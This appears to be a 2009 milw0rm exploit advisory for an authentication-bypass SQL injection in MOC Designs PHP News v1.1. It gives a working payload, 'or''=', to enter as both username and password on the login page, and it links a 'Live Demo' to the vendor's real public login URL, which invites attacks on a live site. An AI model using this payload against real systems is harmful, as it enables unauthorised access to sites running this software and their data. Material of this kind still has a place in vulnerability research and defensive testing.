25 lines
No EOL
617 B
Text
25 lines
No EOL
617 B
Text
#########################################################################
|
|
[+] MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability
|
|
[+] Discovered By SirGod
|
|
[+] http://insecurity-ro.org
|
|
[+] http://h4cky0u.org
|
|
#########################################################################
|
|
|
|
[+] Homepage : http://www.mocdesigns.com/
|
|
|
|
[+] SQL Injection (Auth Bypass)
|
|
|
|
- PoC
|
|
|
|
http://127.0.0.1/news/login.php
|
|
|
|
User : 'or''='
|
|
Password : 'or''='
|
|
|
|
- Live Demo
|
|
|
|
http://www.mocdesigns.com/news/login.php
|
|
|
|
#########################################################################
|
|
|
|
# milw0rm.com [2009-08-04] |